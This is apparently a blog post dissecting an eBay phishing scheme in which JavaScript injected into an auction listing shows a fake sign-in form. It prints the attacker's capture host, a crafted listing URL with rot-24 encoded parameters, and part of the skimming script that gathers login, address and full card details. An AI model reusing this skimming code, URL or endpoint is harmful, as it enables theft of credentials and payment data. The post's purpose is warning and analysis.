eBay Javascript Injection

Most of the phishing emails I get for eBay are pretty obvious. Besides the typos and poor english, they usually link directly to arcane websites. Today I got one that took me to a listing on eBay which contained a login intercept. The script presents a reasonable looking signin form, obfuscates your login and the destination url using rot-24 and sends it on to http://proxy.cheersfilms.com.tw/426006317/66728472 before submitting it to ebay.

I only find it noteworthy because I couldn’t find any public information about xss flaws or other bugs allowing js injection into ebay auction listings and a slightly more sophisticated attack would be pretty hard to detect.

There were several flags that made me cautious. First, the email (which was forged) started with:

eBay sent this message to billh2.
Your registered name is included to show this message originated from eBay.

My eBay user id is not billh2.

The second thing to tingle my spidey sense was the actual message, “hello, i want this item, i’ll pay extra just to be sure we will got a good deal, can you ship to zip code 19146? if all is ok respond me ASAP.” Sheesh! Who offers to pay extra without expecting special handling or something unusual?

The final clues were obvious after I clicked through the link to view my auction. The URL was so long, I couldn’t see the auction number in the link, but it was obviously not the same number presented in my email. At the page, the javascript hides the actual auction item description and substitutes a fake login form. I knew it was fake because it wasn’t a secure page, it didn’t already have my user id and the page wasn’t exactly like it looks when you’re actually logged in to eBay. Despite all that, it was pretty convincing, particularly since I was actually on an eBay webpage.

The javascript was able to hide everything on the page and it could conceivably been made to look much more realistic. Furthermore, since it was actually running from eBay, I imagine it could conceivably have been able to get my userid from the cookie eBay stashes in my browser. Other than the missing letter S in the after http, it could have been flawless. Frankly, that’s pretty scary.

If you want to see the script, it’s still up at

http://cgi.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=ViewItem&Item=5875281930

I neutered the URL so you’ll need to view source to see the javascript.

To see the fake signin page, you can link to http://tinyurl.com/r8ecv

which takes you to

http://cgi.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=ViewItem
&=2&pUserId=&siteid=0&pageType=&pa1=&i1=&bshowgif=&UsingSSL=&ru=&pp=
&pa2=&errmsg=&runame=&ruparams=&ruproduct=&sid=&favoritenav=
&migrateVisitor=&Item=5875281930&aiu=rtqz{0ejggtuhknou0eqo0vy164822853718894:694
&jsc=sig&jsv=1&jsem=vqrruqhvB{cjqq0eqo

(remove white space to link)

aiu is the URL which captures your login (rot-24)

Here’s the part that truly sucks.. If you enter a username and password that passes the script validation, it then prompts you to enter enough information to steal your credit card and most likely your identity. To whit,

	var user=Decript(GetURLVar('jsu'));
	var pass=Decript(GetURLVar('jsp'));
	var firstname=form.firstname.value;
	var lastname=form.lastname.value;
	var address1=form.address1.value;
	var address2=form.address2.value;
	var city=form.city.value;
	var State=form.State.value;
	var zip=form.zip.value;
	var countryId=form.countryId.value;
	var dayphone1=form.dayphone1.value;
	var dayphone2=form.dayphone2.value;
	var dayphone3=form.dayphone3.value;
	var dayphone4=form.dayphone4.value;
	var nightphone1=form.nightphone1.value;
	var nightphone2=form.nightphone2.value;
	var nightphone3=form.nightphone3.value;
	var nightphone4=form.nightphone4.value;
	var cardnumber=form.cardnumber.value;
	var ExpiryMonth=form.ExpiryMonth.value;
	var ExpiryYear=form.ExpiryYear.value;
	var verificationnumber=form.verificationnumber.value;

The javascript looks like it was built using library functions by some script kiddy. Considering how nicely the edits on the form submission are coded, I would have expected the spoof to be a bit more sophisticated.

Sucks to be coloradopackrat today.